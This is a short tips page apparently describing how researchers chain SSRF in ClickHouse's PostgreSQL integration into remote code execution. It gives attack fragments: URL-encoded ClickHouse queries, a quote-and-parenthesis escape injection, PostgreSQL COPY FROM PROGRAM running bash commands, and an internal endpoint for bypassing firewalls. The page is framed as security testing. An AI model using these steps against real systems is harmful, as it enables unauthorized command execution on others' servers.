ClickHouse PostgreSQL SSRF to RCE Chain Testing
Security researchers demonstrate exploiting ClickHouse's PostgreSQL integration to chain Server-Side Request Forgery vulnerabilities with Remote Code Execution
Security researchers testing ClickHouse-PostgreSQL integrations reproduce SSRF-to-RCE chains using documented exploit techniques.
ClickHouse PostgreSQL Function Testing:
SELECT * FROM postgresql('host:5432','db','table','user','pass')- Tests basic connectivityquery=SELECT+*+FROM+postgresql(...)- URL-encodes ClickHouse queries for SSRF- Check escaping:
"posthog_use'))- Injects closing parentheses to break out
PostgreSQL Command Execution:
COPY table FROM PROGRAM $$bash -c "command"$$- Executes shell commandsCREATE TABLE cmd_exec(cmd_output text)- Captures command output- Test internally:
http://clickhouse:8123/?query=...- Bypasses external firewalls
Vulnerability Resources:
- Visit https://github.com/ClickHouse/ClickHouse/security/advisories for escaping bug details
- Review PostgreSQL COPY documentation at https://www.postgresql.org/docs/current/sql-copy.html
This chain exploits webhook SSRF, ClickHouse SQL injection, and PostgreSQL’s PROGRAM feature, demonstrating why defense-in-depth prevents single-point failures.
Related Tips
KaniTTS2: Fast Local Text-to-Speech with Cloning
KaniTTS2 provides a fast, locally-run text-to-speech system with voice cloning capabilities, enabling users to generate natural-sounding speech from text while
AdaLLM: True FP4 Inference on RTX 4090s Without FP16 Fallbac
AdaLLM enables genuine 4-bit floating-point inference on RTX 4090 GPUs without reverting to 16-bit precision, delivering faster and more memory-efficient large
Chatbot Framework Rebuilt in Rust: 10MB Binary
A chatbot framework originally written in another language has been completely rewritten in Rust, resulting in a remarkably compact 10MB binary that